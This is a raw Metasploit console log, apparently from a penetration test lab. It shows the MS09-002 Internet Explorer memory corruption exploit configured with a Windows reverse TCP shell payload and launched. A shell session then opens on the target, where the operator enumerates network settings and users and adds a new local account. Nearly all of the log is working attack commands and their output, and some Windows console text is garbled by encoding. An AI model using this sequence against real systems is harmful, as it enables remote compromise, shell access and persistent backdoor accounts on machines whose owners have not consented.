Welcome to the Metasploit Web Console! 
| | _) | 
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __| 
| | | __/ | ( |\__ \ | | | ( | | | 
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
_| 
=[ metasploit v3.4.2-dev [core:3.4 api:1.0] 
+ -- --=[ 566 exploits - 283 auxiliary 
+ -- --=[ 210 payloads - 27 encoders - 8 nops 
=[ svn r9834 updated 308 days ago (2010.07.14) 
Warning: This copy of the Metasploit Framework was last updated 308 days ago. 
We recommend that you update the framework at least every other day. 
For information on updating your copy of Metasploit, please see: 
http://www.metasploit.com/redmine/projects/framework/wiki/Updating 
>> use windows/browser/ms09_002_memory_corruption 
>> set payload windows/shell/reverse_tcp 
payload => windows/shell/reverse_tcp 
>> show options 
Module options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
SRVHOST 0.0.0.0 yes The local host to listen on. 
SRVPORT 8080 yes The local port to listen on. 
SSL false no Negotiate SSL for incoming connections 
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) 
URIPATH no The URI to use for this exploit (default is random) 
Payload options (windows/shell/reverse_tcp): 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
EXITFUNC process yes Exit technique: seh, thread, process 
LHOST yes The listen address 
LPORT 4444 yes The listen port 
Exploit target: 
Id Name 
-- ---- 
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 
>> set SRVHOST 172.16.2.100 
SRVHOST => 172.16.2.100 
>> set LHOST 172.16.2.100 
LHOST => 172.16.2.100 
>> show options 
Module options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
SRVHOST 172.16.2.100 yes The local host to listen on. 
SRVPORT 8080 yes The local port to listen on. 
SSL false no Negotiate SSL for incoming connections 
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) 
URIPATH no The URI to use for this exploit (default is random) 
Payload options (windows/shell/reverse_tcp): 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
EXITFUNC process yes Exit technique: seh, thread, process 
LHOST 172.16.2.100 yes The listen address 
LPORT 4444 yes The listen port 
Exploit target: 
Id Name 
-- ---- 
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 
>> exploit 
[*] Exploit running as background job. 
[*] Started reverse handler on 172.16.2.100:4444 
[*] Using URL: http://172.16.2.100:8080/9wZVWxuy 
[*] Server started. 
>> back 
>> sessions -l 
Active sessions 
=============== 
Id Type Information Connection 
-- ---- ----------- ---------- 
1 shell 172.16.2.100:4444 -> 172.16.2.120:1125 
>> sessions -i 1 
sessions -i 1 
'sessions' 2?ê??ú2??òía2??üá?￡?ò22?ê??é??DDμ?3ìDò 
?ò?ú′|àí???t?￡ 
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> 
>> ipconfig /all 
ipconfig /all 
Windows IP Configuration 
Host Name . . . . . . . . . . . . : www-95a235b5556 
Primary Dns Suffix . . . . . . . : 
Node Type . . . . . . . . . . . . : Unknown 
IP Routing Enabled. . . . . . . . : No 
WINS Proxy Enabled. . . . . . . . : No 
Ethernet adapter 
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> 
>> net user 
net user 
\\WWW-95A235B5556 μ?ó??§?ê?§ 
------------------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
SUPPORT_388945a0 
?üá?3é1|íê3é?￡ 
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> 
>> net user shentouceshiwy /add 
net user shentouceshiwy /add 
?üá?3é1|íê3é?￡ 
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> 
>> net user 
net user 
\\WWW-95A235B5556 μ?ó??§?ê?§ 
------------------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
shentouceshiwy SUPPORT_388945a0 
?üá?3é1|íê3é?￡